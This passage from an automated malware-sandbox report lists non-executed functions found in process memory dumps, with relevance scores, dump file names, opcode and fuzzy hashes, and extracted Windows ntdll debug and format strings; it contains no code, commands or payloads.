                                                                • Instruction Fuzzy Hash: 94B09B719055C5C5EA11F760460CB17794867D1741F19C4A1D2430741F4779D1D1E275

                                                                Non-executed Functions

                                                                Function 03C1DCE0 Relevance: 56.5, Strings: 45, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3128305681.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3c10000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                • Instruction ID: 33ceb3adb63ba253fdb5a78e75ff725b80e3b19e1e3a74dee19d1dbf7d71c1ce
                                                                • Opcode Fuzzy Hash: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                • Instruction Fuzzy Hash: CA9161F04082948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8915DB85
                                                                Function 03932890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                                                                • Instruction ID: 3f683ee95bb841d681bbd94a7617c6985ab16f3a7601c78e2f5a5c1fd4992e11
                                                                • Opcode Fuzzy Hash: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                                                                • Instruction Fuzzy Hash: 8651D6F6A00256BFCB14DF98C99097EF7BCFB4A2407148AA9E4A5D7641D374DE40CBA0
                                                                Function 039A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                                                                • Instruction ID: 59a4d2da6dacd6525301ddb14788c819f0979f4e425396a888117d662069a6a7
                                                                • Opcode Fuzzy Hash: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                                                                • Instruction Fuzzy Hash: A4510875A04A55AECB30DF9CC89097FF7FDEB44240B088DA9E5D5DB641E7B4DA0087A0
                                                                Function 03927630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03964725
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039646FC
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03964655
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03964787
                                                                • ExecuteOptions, xrefs: 039646A0
                                                                • Execute=1, xrefs: 03964713
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03964742
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                                                                • Instruction ID: a33dfec2e5276b0dc6c4e6e15b7d280eb08007d883385ca49c6a40575bcb158f
                                                                • Opcode Fuzzy Hash: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                                                                • Instruction Fuzzy Hash: D9513735A017296ADF10FAE8DC89FAE7BACAF44340F0404E9D505FB186E7719A45CF51
                                                                Function 039C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction ID: a72e106f94263303c3b42572f1ad02e1f07d26af0b80d7a67bbfa83ea1f63550
                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction Fuzzy Hash: DB021775518381AFD305CF68C890A6BBBE9EFC8740F08892DF9855B265DB31E905CB52
                                                                Function 0393B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: 0466fad1c4cde100c0001cf5744769daee17a83935582127fd5cc290bd8c62f8
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 2481FFF0E412499EDF24DE68C8917FEBBBAEF463A0F1C455AD862A7791C7308840CB51
                                                                Function 039A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                                                                • Instruction ID: 8fe78f0c0fbaa791971238ea3408704cb6db34c01a9e721ca8faae3584fe6bb7
                                                                • Opcode Fuzzy Hash: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                                                                • Instruction Fuzzy Hash: 7821517AE00619ABCB10DF69CC40AEFB7ECEF44684F080626E955E7200E734D9018BE1
                                                                Function 0391F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 0396031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039602E7
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039602BD
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                                                                • Instruction ID: 69948268721b64360fe9c2537abebb7dbe172a5968dbf9c812f78cf5ceffcc6c
                                                                • Opcode Fuzzy Hash: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                                                                • Instruction Fuzzy Hash: 9BE1DC716087499FD725DF28C884B2AB7E8BF84364F180A6DF4A69B3E0D774D854CB42
                                                                Function 0392BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 03967BAC
                                                                • RTL: Resource at %p, xrefs: 03967B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03967B7F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                                                                • Instruction ID: 9a86efa35f7d8a6b1d9f4ea71a919f66acf0f971e1f58efc6c2895e79c13591f
                                                                • Opcode Fuzzy Hash: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                                                                • Instruction Fuzzy Hash: C5410435305B029FD724DE65CC40B6ABBE9EF88720F040A1DF95AEB680DB31E405CB91
                                                                Function 0392B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0396728C
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 039672C1
                                                                • RTL: Resource at %p, xrefs: 039672A3
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03967294
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                                                                • Instruction ID: 053090d102bb98028789e08b7715854f6f5641fb9b8c4f4a6ded4627d216b525
                                                                • Opcode Fuzzy Hash: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                                                                • Instruction Fuzzy Hash: 3141EE36701716ABD720DE65CC81F6ABBE9FB84754F140A19F856EB280DB31F8428BD1
                                                                Function 039A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                                                                • Instruction ID: ac3f5e5f32f72dafce18efb802809cd3a4c9574746768b8aecceb99705712495
                                                                • Opcode Fuzzy Hash: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                                                                • Instruction Fuzzy Hash: 4B314676A006299FCB20DF2DDC40BEEB7FCEF45654F454995E889E7240EF309A458BA0
                                                                Function 03937D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 43403293434a17c0819d5470c098a2e89f7b82bb65c0ab6ba4026980d3be3f2b
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: AC9194F5E0021A9BDF24DFA9C8816FEB7B9FF467A0F18451AE865E72D0D73099408B50
                                                                Function 038F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                                                                • Instruction ID: 62410d381c727ea0943dc8e70ffa2ce102f8e41d8851e62ddde045b96e27b878
                                                                • Opcode Fuzzy Hash: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                                                                • Instruction Fuzzy Hash: 8E813C75D012699FDB21DF94CC44BEAB7B8AB48750F0445EAEA19BB280D7305E84CFA0